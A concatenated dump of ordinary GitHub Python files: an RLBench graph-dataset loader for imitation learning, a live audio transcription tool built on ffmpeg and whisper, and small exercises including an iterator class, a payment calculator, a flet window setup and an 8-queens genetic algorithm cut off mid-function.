dataset\n dataset = []\n\n for f_path in episode_files:\n state_data = np.load(f_path)\n\n for k in range(len(state_data) - 1):\n # nodes\n NUM_NODES = 5\n\n gripper_node = np.concatenate([state_data[k][3], GRIPPER_ENC])\n\n if use_relative_position:\n target_block_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][4]),\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][5]),\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][6]),\n DISTRACT_ENC\n ])\n target_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[len(state_data) - 1][3]),\n TARGET_ENC\n ])\n else:\n target_block_node = np.concatenate([\n state_data[k][4],\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n state_data[k][5],\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n state_data[k][6],\n DISTRACT_ENC\n ])\n target_node = np.concatenate([\n state_data[len(state_data)][3],\n TARGET_ENC\n ])\n\n nodes = torch.tensor(\n [target_block_node, distract_node, distract2_node, target_node, gripper_node],\n dtype=torch.float)\n\n # Build edge relationships (Fully Connected)\n edge_index = torch.tensor([[i, j]\n for i in range(NUM_NODES)\n for j in range(NUM_NODES)\n if i != j],\n dtype=torch.long)\n\n # Extract labels from future frame\n delta = delta_in_pose(state_data[k][3], state_data[k + 1][3])\n final_action = np.concatenate([\n delta,\n [state_data[k + 
1][2][0]] # gripper\n ])\n y = torch.tensor([final_action], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n print(f'Total of {len(dataset)} graphs loaded')\n return dataset\n\n\ndef load_npy_to_graph(data_dir, use_relative_position=True):\n \"\"\"Constructs graph dataset from state data numpy matrices.\n Shape: num_episodes * (4 + number of objects) * 7 (usually pose xyz-quaternion except for\n gripper open/close which is padded with 6 zeroes)\n\n Indices: \n 0 - joint positions\n 1 - joint velocities\n 2 - gripper open\n 3 - gripper pose\n\n 4 - target pose\n 5 - distractor pose\n 6 - distractor pose\n \"\"\"\n # TODO: Add gripper open/close into embedding\n # TODO: Deduce number of nodes .npy file\n\n # get all episodes\n pattern = os.path.join(data_dir, \"*/*/*/*.npy\")\n episode_files = glob.glob(pattern)\n\n print(f'Found {len(episode_files)} numpy state data files to load.')\n # construct dataset\n dataset = []\n\n for f_path in episode_files:\n state_data = np.load(f_path)\n\n for k in range(len(state_data) - 1):\n # nodes\n NUM_NODES = 4\n\n gripper_node = np.concatenate([state_data[k][3], GRIPPER_ENC])\n\n if use_relative_position:\n target_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][4]),\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][5]),\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][6]),\n DISTRACT_ENC\n ])\n else:\n target_node = np.concatenate([\n state_data[k][3], state_data[k][4],\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n state_data[k][3], state_data[k][5],\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n state_data[k][3], state_data[k][6],\n DISTRACT_ENC\n ])\n\n nodes = torch.tensor(\n [target_node, distract_node, distract2_node, gripper_node],\n dtype=torch.float)\n\n # Build edge relationships (Fully Connected)\n edge_index = torch.tensor([[i, j]\n for i in range(NUM_NODES)\n for j in range(NUM_NODES)\n if i != j],\n dtype=torch.long)\n\n # Extract labels from future frame\n delta = delta_in_pose(state_data[k][3], state_data[k + 1][3])\n y = torch.tensor([delta], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n print(f'Total of {len(dataset)} graphs loaded')\n return dataset\n\n\ndef delta_in_pose(pose1, pose2):\n # TODO: Double check this stuff\n # RLbench Pose = X, Y, Z, QX, QY, QZ, QW\n # Quaternions = QW, QX, QY, QZ\n\n q1x, q1y, q1z, q1w = pose1[3:]\n q2x, q2y, q2z, q2w = pose2[3:]\n\n q1 = Quaternion(q1w, q1x, q1y, q1z)\n q2 = Quaternion(q2w, q2x, q2y, q2z)\n\n delta_rot = q2 * q1.inverse\n\n # Normalize to be unit quaternion\n #delta_rot = delta_rot.unit\n qw, qx, qy, qz = list(delta_rot)\n\n x, y, z = pose2[:3] - pose1[:3]\n\n diff = [x, y, z] + [qx, qy, qz, qw]\n\n return np.array(diff)\n\n\ndef split_train_test(dataset, train_ratio=0.8):\n \"\"\"Makes training and testing sets (could extend for validation).\"\"\"\n n = len(dataset)\n n_train = int(n * train_ratio)\n\n random.shuffle(dataset)\n d_train = dataset[:n_train]\n d_test = dataset[n_train:]\n return d_train, d_test\n\n\n# -----------------------------------------------------------------------------------\n# Reach Target\n# -----------------------------------------------------------------------------------\n\ntarget_enc = np.array([1, 0, 0])\ndistract_enc = np.array([0, 1, 
0])\ngripper_enc = np.array([0, 0, 1])\n\n\ndef load_data_to_graph(data_dir, use_relative_pos=True):\n \"\"\"Constructs dataset for behavior cloning from JSON dataset.\"\"\"\n # get all episodes\n pattern = os.path.join(data_dir, \"state_data_*.json\")\n episode_files = glob.glob(pattern)\n\n # construct dataset\n dataset = []\n\n for f_path in episode_files:\n with open(f_path, \"r\") as f:\n data = json.load(f)\n obs = data[\"obs\"]\n\n for k in range(data[\"length\"] - 1):\n # nodes\n node_num = len(obs[k])\n\n if use_relative_pos:\n target_node = np.concatenate([\n np.array(obs[k][\"target\"]) - np.array(obs[k][\"tip\"]),\n target_enc\n ])\n distract_node = np.concatenate([\n np.array(obs[k][\"distractor0\"]) - np.array(obs[k][\"tip\"]),\n distract_enc\n ])\n distract2_node = np.concatenate([\n np.array(obs[k][\"distractor1\"]) - np.array(obs[k][\"tip\"]),\n distract_enc\n ])\n gripper_node = np.concatenate(\n [np.array(obs[k][\"tip\"]), gripper_enc])\n else:\n target_node = np.concatenate(\n [np.array(obs[k][\"target\"]), target_enc])\n distract_node = np.concatenate(\n [np.array(obs[k][\"distractor0\"]), distract_enc])\n distract2_node = np.concatenate(\n [np.array(obs[k][\"distractor1\"]), distract_enc])\n gripper_node = np.concatenate(\n [np.array(obs[k][\"tip\"]), gripper_enc])\n\n nodes = torch.tensor(\n [target_node, distract_node, distract2_node, gripper_node],\n dtype=torch.float)\n\n # edges\n edge_index = torch.tensor([[i, j]\n for i in range(node_num)\n for j in range(node_num)\n if i != j],\n dtype=torch.long)\n\n # label\n y = torch.tensor([np.array(obs[k + 1][\"tip\"])], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n return dataset\n\n\ndef preprocess_data(data_dir, out_dir):\n \"\"\"Converts raw data from RLBench to desired format.\n\n Use JSON format for easy visualizaing. 
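As an assumed example of the mapping implemented below (read off the glob\n pattern and the two regexes): an episode directory ending in\n 'variation3/episodes/episode12' is written to '<out_dir>/state_data_3_12.json'.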
\n \"\"\"\n os.makedirs(out_dir, exist_ok=True)\n # get all episodes\n pattern = os.path.join(data_dir, \"*/episodes/episode*\")\n episode_dirs = glob.glob(pattern, recursive=True)\n\n for d in episode_dirs:\n # load data\n data_path = os.path.join(d, \"low_dim_obs.pkl\")\n with open(data_path, \"rb\") as f:\n data = pickle.load(f)\n\n # convert data\n formatted_data = {\"obs\": [], \"length\": len(data._observations)}\n\n for obs in data._observations:\n vel = obs.joint_velocities\n state = obs.task_low_dim_state\n\n result = {\n \"target\": state[0].tolist(),\n \"distractor0\": state[1].tolist(),\n \"distractor1\": state[2].tolist(),\n \"tip\": state[3].tolist()\n }\n formatted_data[\"obs\"].append(result)\n\n # save processed data\n variation_match = re.search(r\"variation\\d+\", d)\n variation_num = int(variation_match.group().replace(\"variation\", \"\"))\n episode_match = re.search(r\"episodes/episode\\d+\", d)\n episode_num = int(episode_match.group().replace(\"episodes/episode\", \"\"))\n data_out_path = os.path.join(\n out_dir, \"state_data_{}_{}.json\".format(variation_num, episode_num))\n with open(data_out_path, \"w\") as f:\n json.dump(formatted_data, f, indent=4)\n\n\n# -----------------------------------------------------------------------------------\n# Block Stacking\n# -----------------------------------------------------------------------------------\n\n# -----------------------------------------------------------------------------------\n# Preprocessing only\n# -----------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n data_dir = \"data/reach_target\"\n out_dir = \"data/reach_target_processed\"\n preprocess_data(data_dir, out_dir)\n","repo_name":"StafaH/graph-imitation-learning","sub_path":"src/graphs/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23043519983","text":"#!/usr/bin/env python3\n\"\"\"\nTranscribe audio livestream or file by feeding ffmpeg output to whisper.cpp or openai at regular intervals\n\nPython implementation by @tarasglek\ninspired by: https://github.com/ggerganov/whisper.cpp/issues/185 https://github.com/ggerganov/whisper.cpp/blob/master/examples/livestream.sh\n\"\"\"\nimport asyncio\nimport datetime\nimport json\nimport math\nimport os\nimport subprocess\nimport sys\nimport argparse\nimport time\nimport logging\nimport pysrt\nfrom typing import List\n\nOPENAI_CONTENT_LENGTH_LIMIT = 26214400\nOVERLAP_SECONDS = 1\n\nFFMPEG_CMD_PREFIX = (\n \"ffmpeg \"\n \"-loglevel error \"\n \"-y \"\n)\nFFMPEG_CONVERT_TO_WAV_CMD = FFMPEG_CMD_PREFIX + (\n \"-noaccurate_seek \"\n \"-i {input_file} \"\n \"-ar 16000 \"\n \"-ac 1 \"\n \"-c:a pcm_s16le \"\n \"-ss {start_time} \"\n \"-t {duration} \"\n \"{output_file}\"\n)\n\nWHISPER_CMD = (\n \"{whisper_path}/main \"\n \"-t {num_cpu} \"\n \"-m {whisper_path}/models/ggml-{model}.bin \"\n \"-f {input_file} \"\n # \"--no-timestamps \"\n \"-osrt \"\n \"--output-file {output_file} \"\n \"--prompt \\\"{prompt}\\\" \"\n)\n\ndef get_extension(filename):\n return os.path.splitext(filename)[1][1:]\n\nasync def extension_for_openai(input_file):\n supported_extensions = ['m4a', 'mp3', 'webm', 'mp4', 'mpga', 'wav', 'mpeg']\n input_extension = get_extension(input_file)\n if input_extension == \"mp4\":\n return \"m4a\"\n elif input_extension == \"oga\":\n return \"webm\"\n if input_extension == \"\":\n # need determine codec\n codec = await 
probe_codec_with_ffmpeg(input_file)\n if codec == \"aac\":\n return \"m4a\"\n elif codec in [\"vorbis\", \"opus\"]:\n return \"webm\"\n else:\n raise RuntimeError(f\"Can't determine extension for input file {input_file}, codec: {codec}\")\n if input_extension not in supported_extensions:\n raise RuntimeError(f\"Input file extension '{input_extension}' not supported by OpenAI API. Supported extensions: {supported_extensions}\")\n return input_extension\n\ndef gen_ffmpeg_copy_audio_cmd(input_url_or_file: str, output_file:str, read_input_at_native_frame_rate=False, start_time=0, duration=None) -> List[str]:\n cmdls = FFMPEG_CMD_PREFIX.strip().split(' ') + [\n \"-i\",\n input_url_or_file,\n \"-vn\",\n \"-c\",\n \"copy\",\n \"-ss\",\n str(start_time),]\n if read_input_at_native_frame_rate:\n cmdls += [\"-re\"]\n if duration is not None:\n cmdls += [\"-t\", str(duration)]\n cmdls.append(output_file)\n return cmdls\n\nasync def gen_ffmpeg_copy_audio_cmd_for_openai(input_url_or_file: str, output_file:str, start_time=0, duration=None) -> List[str]:\n audio_extensions_supported_by_openai = ['m4a', 'mp3', 'mpga', 'wav']\n extension = get_extension(output_file)\n if extension in audio_extensions_supported_by_openai:\n return gen_ffmpeg_copy_audio_cmd(input_url_or_file, output_file, start_time=start_time, duration=duration)\n\n # for webm we strip actual video and add dummy tiny video stream\n ext2codec_encoder = {\n 'webm': 'libvpx',\n }\n encoder = ext2codec_encoder.get(extension)\n if encoder is None:\n raise RuntimeError(f\"Can't find encoder for extension: {extension}\")\n\n # ffmpeg -i samples/LeavingmystartupjobtobuildcreateandexperimentIfEs8EnTZKQ.webm -f lavfi -i color=c=black:s=1x1 -map 0:a -map 1:v -c:a copy -c:v libvpx -b:v 1M output.webm\n cmdls = FFMPEG_CMD_PREFIX.strip().split(' ') + [\n \"-i\",\n input_url_or_file,\n \"-f\",\n \"lavfi\",\n \"-i\",\n \"color=c=black:s=2x2\",\n \"-map\",\n \"0:a\",\n \"-map\",\n \"1:v\",\n \"-c:a\",\n \"copy\",\n \"-c:v\",\n encoder,\n \"-b:v\",\n \"500k\",\n \"-ss\",\n str(start_time),]\n\n if duration is not None:\n cmdls += [\"-t\", str(duration)]\n cmdls.append(output_file)\n return cmdls\n\nasync def run_command_unsafe(cmd):\n start_time = time.time()\n process = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE\n )\n\n stdout, stderr = await process.communicate()\n end_time = time.time()\n logging.debug(f\"Command '{cmd}' ran in {end_time - start_time} seconds\", )\n if process.returncode != 0:\n if len(stdout) > 0:\n logging.error(\"stdout:\" + stdout.decode())\n logging.error(\"stderr:\" + stderr.decode())\n raise subprocess.CalledProcessError(process.returncode, cmd, stdout, stderr)\n return stdout.decode()\n\n\"\"\"\nRuns background process, allows it to be cancelled\n\"\"\"\nasync def run_process_background(cmd, *args):\n process = await asyncio.create_subprocess_exec(cmd, *args,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE)\n logging.debug(f\"Running process '{' '.join([cmd] + list(args))}' in background as pid {process.pid}\")\n process.killed = False\n async def monitor_process():\n stdout, stderr = await process.communicate()\n\n if process.returncode != 0 and not process.killed:\n error_msg = f\"Process '{' '.join([cmd] + list(args))}' failed with return code {process.returncode}\"\n logging.error(error_msg)\n if len(stdout) > 0:\n logging.error(f\"stdout: {stdout.decode().strip()}\")\n logging.error(f\"stderr: {stderr.decode().strip()}\")\n raise 
RuntimeError(error_msg)\n return asyncio.create_task(monitor_process()), process\n\nasync def default_get_birth_time(file_path):\n loop = asyncio.get_event_loop()\n try:\n stat = await loop.run_in_executor(None, os.stat, file_path)\n return stat.st_birthtime\n except AttributeError:\n return 0\n\nasync def ffmpeg_get_duration(filename: str):\n \"\"\"\n @returns duration in seconds\n @raises ValueError if unable to get duration\n \"\"\"\n duration = await run_command_unsafe(f\"ffprobe -i {filename} -show_entries format=duration -v quiet -of csv=p=0\")\n logging.debug(f\"Duration of {filename} is {duration} seconds\")\n duration = int(float(duration))\n return duration\n\ndef time_to_seconds(time_obj: datetime.time):\n return time_obj.hour * 3600 + time_obj.minute * 60 + time_obj.second + time_obj.microsecond / 1e6\n\ndef srt_trim_last(srt_file: str, end_of_file_seconds: float):\n \"\"\"\n Used to give context from one subtitle chunk to next. \n We assume that last thing said in srt was incomplete and overlap that on next iteration of whisper\n @returns last prompt(that was kept), start_seconds to start next transcription at\n \"\"\"\n subs: pysrt.SubRipFile = pysrt.open(srt_file)\n last_prompt = None\n start_seconds = end_of_file_seconds\n end_seconds = end_of_file_seconds\n if len(subs) > 1:\n # get time in seconds of start of subtitle\n last_sub = subs[-1]\n sub_start_seconds = time_to_seconds(last_sub.start.to_time())\n sub_end_seconds = time_to_seconds(last_sub.end.to_time())\n # if last subtitle is more than 1 second before end of file, then we assume it was complete\n if end_of_file_seconds - end_seconds <= 1:\n start_seconds = sub_start_seconds\n end_seconds = sub_end_seconds\n # remove last subtitle cos we gonna re-transcribe it\n logging.debug(f\"Removing {last_sub.start}-{last_sub.end}:{json.dumps(last_sub.text)} from {srt_file} for clean overlap\")\n subs.pop(-1)\n subs.clean_indexes()\n subs.save(srt_file, encoding='utf-8')\n if len(subs) > 0:\n last_sub = subs[-1]\n last_prompt = str(last_sub.text)\n return last_prompt, start_seconds\n \ndef append_srt_file(srt_file_from_0, offset_s, srt_file_to_add):\n \"\"\"\n use pysrt to append srt_file_to_add to srt_file_from_0 after adjusting timestamps in srt_file_to_add by offset_s\n \"\"\"\n subs_0 = pysrt.open(srt_file_from_0)\n subs_to_add = pysrt.open(srt_file_to_add)\n\n for sub in subs_to_add:\n sub.start += pysrt.SubRipTime(seconds=offset_s)\n sub.end += pysrt.SubRipTime(seconds=offset_s)\n subs_0.append(sub)\n\n subs_0.clean_indexes()\n subs_0.save(srt_file_from_0, encoding='utf-8')\n\nasync def transcribe(params, get_birth_time=default_get_birth_time):\n model = params.get('model')\n whisper_path = params.get('whisper_path')\n input_file = params.get('input_file')\n output_file = params.get('output_file')\n num_cpu = params.get('num_cpu')\n use_openai_api = params.get('use_openai_api')\n follow_stream = params.get('follow_stream')\n tmp_audio_chunk_file = f\"/tmp/whisper-live.{await extension_for_openai(input_file) if use_openai_api else 'wav'}\"\n chunk_duration_s = params.get('step_s')\n input_duration = 0 if follow_stream else await ffmpeg_get_duration(input_file)\n if not chunk_duration_s:\n if follow_stream or not use_openai_api:\n chunk_duration_s = 30\n else:\n chunk_duration_s = input_duration\n\n logging.info(f\"json: {json.dumps(params)}\")\n start_time = float(0)\n prompt=\"\"\n old_creation_ts = 0\n running = True\n while running:\n file_creation_ts_in_unixtime_ms = await get_birth_time(input_file)\n if 
file_creation_ts_in_unixtime_ms != old_creation_ts:\n logging.info(f\"File {input_file} was modified at {file_creation_ts_in_unixtime_ms}. Reading from beginning...\")\n old_creation_ts = file_creation_ts_in_unixtime_ms\n start_time = float(0)\n prompt = \"\"\n try:\n os.remove(tmp_audio_chunk_file)\n except OSError:\n pass\n if use_openai_api:\n cmd = ' '.join(await gen_ffmpeg_copy_audio_cmd_for_openai(\n input_url_or_file=input_file,\n output_file=tmp_audio_chunk_file,\n start_time=start_time,\n duration=chunk_duration_s))\n else:\n cmd = FFMPEG_CONVERT_TO_WAV_CMD.format(\n start_time=start_time,\n duration=chunk_duration_s,\n input_file=input_file,\n output_file=tmp_audio_chunk_file\n )\n try:\n await run_command_unsafe(cmd)\n except subprocess.CalledProcessError as e:\n if e.stderr.decode().strip().endswith(\"End of file\") or int(start_time) == 0:\n logging.info(f\"Waiting {chunk_duration_s}s for {input_file} file to get more audio...\")\n await asyncio.sleep(chunk_duration_s)\n continue\n else:\n raise e\n\n try:\n tmp_duration = await ffmpeg_get_duration(tmp_audio_chunk_file)\n logging.debug(f\"Got {tmp_duration} seconds of audio in {tmp_audio_chunk_file}\")\n except ValueError:\n logging.error(f\"ffmpeg failed to get duration of {tmp_audio_chunk_file}\")\n if not follow_stream:\n raise RuntimeError(f\"ffmpeg failed to get duration of {tmp_audio_chunk_file}\")\n tmp_duration = 0\n file_size = 0\n if use_openai_api:\n file_size = os.path.getsize(tmp_audio_chunk_file)\n logging.debug(f\"Got {file_size} bytes of audio in {tmp_audio_chunk_file}\")\n if file_size > OPENAI_CONTENT_LENGTH_LIMIT:\n logging.info(f\"Audio file {tmp_audio_chunk_file} is larger than limit of {OPENAI_CONTENT_LENGTH_LIMIT} bytes\")\n too_big_ratio = math.ceil(file_size / OPENAI_CONTENT_LENGTH_LIMIT)\n old_step_s = chunk_duration_s\n chunk_duration_s = math.floor(chunk_duration_s / too_big_ratio) - 1\n logging.info(f\"Reducing chunk_duration_s from {old_step_s} to {chunk_duration_s} seconds based on file size overshoot\")\n continue\n\n if tmp_duration < chunk_duration_s:\n if follow_stream:\n logging.info(f\"Not enough audio in {input_file} yet. Got {tmp_duration}/{chunk_duration_s}, waiting {chunk_duration_s-tmp_duration} seconds...\")\n await asyncio.sleep(chunk_duration_s - tmp_duration)\n continue\n else:\n running = False\n\n tmp_output_file = os.path.join(os.path.dirname(output_file), f\"whisper-live-{start_time}\")\n if use_openai_api:\n tmp_output_file += \".srt\"\n import openai\n with open(tmp_audio_chunk_file, \"rb\") as f:\n openai_start_time = time.time()\n transcript = openai.Audio.transcribe(\"whisper-1\", f, response_format=\"srt\", prompt=prompt)\n elapsed_time = time.time() - openai_start_time\n logging.debug(f\"Transcribed {tmp_audio_chunk_file} in {elapsed_time} seconds. Speedup: {chunk_duration_s / elapsed_time}. 
Throughput: {file_size / elapsed_time} bytes per second\")\n            # print(transcript)\n            # yield {\"output\": transcript}\n            with open(tmp_output_file, \"w\") as f:\n                f.write(transcript)\n            logging.debug(f\"wrote {tmp_output_file}\")\n        else:\n            cmd = WHISPER_CMD.format(\n                model=model,\n                num_cpu=num_cpu,\n                input_file=tmp_audio_chunk_file,\n                whisper_path=whisper_path,\n                output_file=tmp_output_file,\n                prompt=prompt,\n            )\n            output = await run_command_unsafe(cmd)\n            tmp_output_file += \".srt\"\n        if int(start_time) == 0:\n            logging.debug(f\"Renaming {tmp_output_file} to {output_file}\")\n            os.rename(tmp_output_file, output_file)\n        else:\n            logging.debug(f\"Appending {tmp_output_file} to {output_file}\")\n            append_srt_file(output_file, start_time, tmp_output_file)\n            logging.debug(f\"Removing {tmp_output_file}\")\n            os.remove(tmp_output_file)\n\n\n        start_time += chunk_duration_s\n        if input_duration and (start_time >= input_duration):\n            running = False\n            logging.info(f\"Successfully transcribed {start_time}/{input_duration} seconds of {input_file}\")\n        else:\n            prompt, start_time = srt_trim_last(output_file, start_time)\n        yield {\"output_file\": output_file, \"end_time_s\": start_time, \"duration_s\": input_duration}\n\ndef argparser():\n    URL = \"http://a.files.bbci.co.uk/media/live/manifesto/audio/simulcast/hls/nonuk/sbr_low/ak/bbc_world_service.m3u8\"\n    MODEL = \"base.en\"\n    WHISPER_PATH = \".\"\n    NUM_CPU = 4\n    parser = argparse.ArgumentParser(description='Transcribe audio livestream by feeding ffmpeg output to whisper.cpp at regular intervals')\n    parser.add_argument('-u', '--url', type=str, default=URL, help='URL of the audio livestream')\n    parser.add_argument('-s', '--step', type=int, default=None, help='step size in seconds; defaults to 30s, or to the whole input (capped by the 25MB upload limit) when using the OpenAI API on a finished file')\n    parser.add_argument('-m', '--model', type=str, default=MODEL, help='model to use for transcription')\n    parser.add_argument('-p', '--whisper-path', type=str, default=WHISPER_PATH, help='path to whisper.cpp build')\n    parser.add_argument('-v', '--verbose', action='store_true', help='print verbose output')\n    parser.add_argument('-n', '--num-cpu', type=int, default=NUM_CPU, help='number of cpus to use')\n    parser.add_argument('--use-openai-api', action='store_true', help='use OpenAI API instead of local whisper.cpp')\n    parser.add_argument('-f', '--follow-stream', action='store_true', help='Continuously follow web stream or local file (like tail -F)')\n    parser.add_argument('--output-file', default=\"transcription.srt\", help='output file')\n    return parser\n\ndef setup_logging(debug=False):\n    logging.getLogger().setLevel(logging.DEBUG if debug else logging.INFO)\n    handler = logging.StreamHandler(sys.stdout)\n    formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')\n    handler.setFormatter(formatter)\n    logging.getLogger().addHandler(handler)\n\nasync def probe_codec_with_ffmpeg(url_or_file: str) -> str:\n    codec = (await run_command_unsafe(\n        \"ffprobe \"\n        \"-loglevel error \"\n        \" -select_streams a:0 \"\n        \" -show_entries stream=codec_name \"\n        \" -of default=noprint_wrappers=1:nokey=1 \"\n        f\" {url_or_file}\"\n    )).split(\"\\n\")[0].strip()\n    logging.debug(\"codec: '%s'\", codec)\n    return codec\n\nasync def live_transcribe(get_birth_time=default_get_birth_time):\n    tmp_live_file = None\n    background_process = None\n\n    args = argparser().parse_args()\n    setup_logging(args.verbose)\n    logging.info(f\"Transcribing {args.url} using model '{args.model}', with {args.step} second steps (press Ctrl+C to stop):\\n\")\n    
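# If args.url is a local file we transcribe it directly; otherwise a background\n    # ffmpeg copy (started below) buffers the remote stream into a local file that\n    # each transcription chunk can re-open and seek as it grows.\n    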
input_compressed_file = None\n    if os.path.exists(args.url):\n        input_compressed_file = args.url\n    else:\n        input_codec = await probe_codec_with_ffmpeg(args.url)\n        tmp_live_file = f\"/tmp/whisper-local-buffer.{input_codec}\"\n        cmdls = gen_ffmpeg_copy_audio_cmd(args.url, tmp_live_file, read_input_at_native_frame_rate=True)\n        background_process = await run_process_background(*cmdls)\n\n        while not os.path.exists(tmp_live_file):\n            logging.debug(\"Waiting for %s to be created...\", tmp_live_file)\n            await asyncio.sleep(1)\n\n        input_compressed_file = tmp_live_file\n    try:\n        params = {\n            'step_s': args.step,\n            'model': args.model,\n            'whisper_path': args.whisper_path,\n            'input_file': input_compressed_file,\n            'num_cpu': args.num_cpu,\n            'use_openai_api': args.use_openai_api,\n            'follow_stream': args.follow_stream,\n            'output_file': args.output_file,\n        }\n        async for chunk in transcribe(params, get_birth_time=get_birth_time):\n            yield chunk\n    finally:\n        logging.debug(f\"finally: background_process: {background_process}, tmp_live_file: {tmp_live_file}\")\n        if background_process:\n            task, process = background_process\n            if process.returncode is None:\n                process.killed = True\n                logging.debug(\"Killing background process %s\", process.pid)\n                process.terminate()\n            await task\n        if tmp_live_file and os.path.exists(tmp_live_file):\n            logging.debug(\"Removing %s\", tmp_live_file)\n            os.remove(tmp_live_file)\n\nasync def main():\n    async for chunk in live_transcribe():\n        logging.info(chunk)\n\nif __name__ == \"__main__\":\n    try:\n        asyncio.run(main())\n    except KeyboardInterrupt:\n        print(\"Interrupted by user. Exiting...\")\n        sys.exit(0)\n\n","repo_name":"tarasglek/whisper_multitool","sub_path":"whisper_multitool.py","file_name":"whisper_multitool.py","file_ext":"py","file_size_in_byte":18595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36790886026","text":"class AnyIter(object):\n\n    def __init__(self, seq, safe=False):\n        self.safe = safe\n        self.iter = iter(seq)\n\n    def __iter__(self):\n        return self\n\n    # This method is called on each loop iteration\n    def __next__(self, how_many=1):\n        result = []\n        for eachItem in range(how_many):\n            try:\n                result.append(self.iter.__next__())\n            except StopIteration as e:\n                if self.safe:\n                    return result\n                else:\n                    raise e\n        return result\n\n\nanyIter = AnyIter(range(5), True)\n# Calling iter() is equivalent to calling anyIter's __iter__ method\nmyIter = iter(anyIter)\nmyIter.__next__(88)\n","repo_name":"bestchenwu/PythonStudy","sub_path":"Unit13/AnyIter.py","file_name":"AnyIter.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69879933549","text":"prc = float(input('Digite o preço do produto: '))\nfm = input('Escolha a forma de pagamento:\\n'\n           '1 - À vista no dinheiro/cheque\\n'\n           '2 - À vista no cartão\\n'\n           '3 - Até 2x no cartão\\n'\n           '4 - 3x ou mais no cartão\\n'\n           'Selecione: ')\nprint('-'*40)\n\nif fm == '1':\n    print('À VISTA DINHEIRO/CHEQUE: R${:.2f}'.format(prc - (prc / 10)))\nelif fm == '2':\n    print('À VISTA CARTÃO: R${:.2f}'.format(prc - (prc / 20)))\nelif fm == '3':\n    print('EM ATÉ 2X NO CARTÃO: R${:.2f}'.format(prc))\nelif fm == '4':\n    vn = prc / 5\n    print('EM 3X OU MAIS NO CARTÃO: R${:.2f}'.format((prc + vn)))\nelse:\n    print('Opção inválida')\n","repo_name":"Thomaz-Castro/Programas-CursoEmVideo","sub_path":"Aulas Mundo 02/exercicios/aula 12/ex 044.py","file_name":"ex 
044.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"519926869","text":"\"\"\"Perform screen settings\"\"\"\nfrom flet import Page\n\ndef configure_window(page: Page):\n    \"\"\"\n    Determines the default size and minimum screen size of the app\n\n    * Args:\n    \\t - page (Page): An instance of the page to make the changes\n    \"\"\"\n    height = 500\n    width = 500\n\n    page.title = \"Qr code Generator\"\n    page.window_maximizable = False\n    page.window_width = width\n    page.window_height = height\n    page.window_min_width = width\n    page.window_min_height = height\n    page.window_center()\n    page.update()\n","repo_name":"rianwilliam/qrcode_generator","sub_path":"src/window_conf.py","file_name":"window_conf.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1213640049","text":"import random\n\nfrom queens_fitness import *\n\np_mutation = 0.2 # Low random probability for mutation\nnum_of_generations = 30 # Num of generations that will be created\nnum_of_queens = 8 # 8 queens\n\n\ndef genetic_algorithm(population, fitness_fn, minimal_fitness):\n    '''Algorithm where the fittest are selected for reproduction in order to produce offspring for the next generation.\n    It returns the fittest individual.'''\n    \n    # Loop that creates each generation\n    for generation in range(num_of_generations):\n        # Print the num of current generation\n        print(\"Generation {}:\".format(generation)) \n        # Print all the chromosomes of the current generation along with their fitness score\n        print_population(population, fitness_fn)\n\n        # New population that is going to be unioned with the current one, that is initially empty\n        new_population = set()\n\n        # Total fitness score is the sum of all the fitness scores\n        fitness_scores_sum = 0\n        for chromosome in population:\n            # Since the fitness score can be negative, we add 28 (= 0 + 1 + 2 + 3 + 4 + 5 + 6 + 7), which\n            # is the score we get when all possible conflicts happen.\n            # With this, we won't ever have a negative fitness score.\n            fitness_scores_sum = fitness_scores_sum + (fitness_fn(chromosome) + 28)\n\n        # Fitness ratio, calculated by dividing the fitness score of each chromosome-individual by fitness_scores_sum.\n        fitness_ratio = []\n        for chromosome in population:\n            fitness_ratio.append((fitness_fn(chromosome) + 28)/fitness_scores_sum) \n\n        # For each chromosome\n        for i in range(len(population)):\n            # Select a pair of individuals, the parents, based on their fitness score\n            mother, father = random_selection(population, fitness_fn, fitness_ratio)\n\n            # Reproduce two individuals with single-point crossover & return the two child individuals\n            child1, child2 = reproduce(mother, father)\n\n            # Mutation to maintain diversity within the population and avoid premature convergence, for the two children\n            if random.uniform(0, 1) < p_mutation:\n                child1 = mutate(child1)\n            if random.uniform(0, 1) < p_mutation:\n                child2 = mutate(child2)\n\n            # Add each child (new chromosome) to the new population\n            new_population.add(child1)\n            new_population.add(child2)\n\n        # Add new population to population, use union to disregard\n        # duplicate individuals\n        population = population.union(new_population)\n\n        # The individual with the highest fitness score from the 